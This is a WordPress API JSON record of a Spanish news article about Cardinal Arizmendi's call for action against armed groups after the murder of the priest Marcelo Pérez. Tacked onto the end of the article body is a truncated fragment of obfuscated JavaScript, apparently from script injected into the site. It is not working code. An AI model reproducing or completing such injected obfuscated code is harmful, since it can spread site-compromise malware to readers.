{"id":18491,"date":"2024-10-22T04:27:45","date_gmt":"2024-10-22T04:27:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18491"},"modified":"2024-10-22T04:27:45","modified_gmt":"2024-10-22T04:27:45","slug":"cardenal-arizmendi-exige-acciones-inmediatas-contra-la-violencia-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18491","title":{"rendered":"Cardenal Arizmendi exige acciones inmediatas contra la violencia en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"314\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241021-WA2004.jpg\" alt=\"\" class=\"wp-image-18492\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241021-WA2004.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241021-WA2004-300x131.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>21 de octubre del 2024. San Andr\u00e9s Larra\u00ednzar.- El Cardenal Felipe Arizmendi Esquivel expres\u00f3 su profundo pesar ante el asesinato del p\u00e1rroco Marcelo P\u00e9rez P\u00e9rez, durante la misa de exequias celebrada en San Andr\u00e9s Larra\u00ednzar. El obispo em\u00e9rito de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas hizo un en\u00e9rgico llamado a las autoridades para desarticular y desarmar a los grupos armados que han sembrado violencia en la regi\u00f3n y en todo el pa\u00eds.<\/p>\n\n\n\n<p>\u201cNo podemos permitir que este crimen quede impune. Lo importante es que las autoridades act\u00faen con inteligencia para eliminar a estos grupos. No queremos m\u00e1s violencia, pero s\u00ed que se desarmen estos grupos que est\u00e1n causando tanto da\u00f1o en todas partes. Esto es un reflejo de lo que sucede en todo el pa\u00eds\u201d, enfatiz\u00f3 Arizmendi.<\/p>\n\n\n\n<p>El Cardenal tambi\u00e9n subray\u00f3 la gravedad de la inseguridad que afecta a diversas zonas de M\u00e9xico, no solo a Chiapas. &#8220;Yo vivo ahora en Toluca, y all\u00e1 tambi\u00e9n hay problemas. En mi pueblo, en la regi\u00f3n sur del Estado de M\u00e9xico, la situaci\u00f3n es compleja con la presencia de un solo c\u00e1rtel, la Familia Michoacana. Aqu\u00ed en Chiapas, la lucha entre c\u00e1rteles complica mucho m\u00e1s las cosas&#8221;, afirm\u00f3.<\/p>\n\n\n\n<p>Arizmendi Esquivel se\u00f1al\u00f3 que la violencia que afecta a Chiapas es un s\u00edntoma de la descomposici\u00f3n que enfrenta el pa\u00eds, y record\u00f3 que aunque siempre han existido problemas en la regi\u00f3n, las circunstancias actuales son mucho m\u00e1s graves. &#8220;Lamentablemente, el pa\u00eds est\u00e1 en descomposici\u00f3n&#8221;.<\/p>\n\n\n\n<p>El cardenal tambi\u00e9n destac\u00f3 la entrega y compromiso del padre Marcelo, a quien describi\u00f3 como un sacerdote extraordinario, fiel a la Iglesia y dedicado al servicio de su comunidad. \u201cSu vida termin\u00f3 en lo humano, en lo temporal, pero tenemos la firme esperanza en Cristo Jes\u00fas de que le dar\u00e1 vida plena\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Finalmente, Arizmendi lament\u00f3 que la violencia en M\u00e9xico se est\u00e9 agravando y exhort\u00f3 a la sociedad a educar desde el hogar a los hijos en la paz y la justicia, al tiempo que pidi\u00f3 a los medios de comunicaci\u00f3n y autoridades no ignorar la realidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 21 de octubre del 2024. San Andr\u00e9s Larra\u00ednzar.- El Cardenal Felipe Arizmendi Esquivel expres\u00f3 su profundo pesar ante el asesinato del p\u00e1rroco Marcelo P\u00e9rez P\u00e9rez, durante la misa de exequias celebrada en San Andr\u00e9s Larra\u00ednzar. El obispo em\u00e9rito de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas hizo un en\u00e9rgico llamado a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18492,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18491","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18491","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18491"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18491\/revisions"}],"predecessor-version":[{"id":18493,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18491\/revisions\/18493"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18492"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18491"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18491"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18491"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}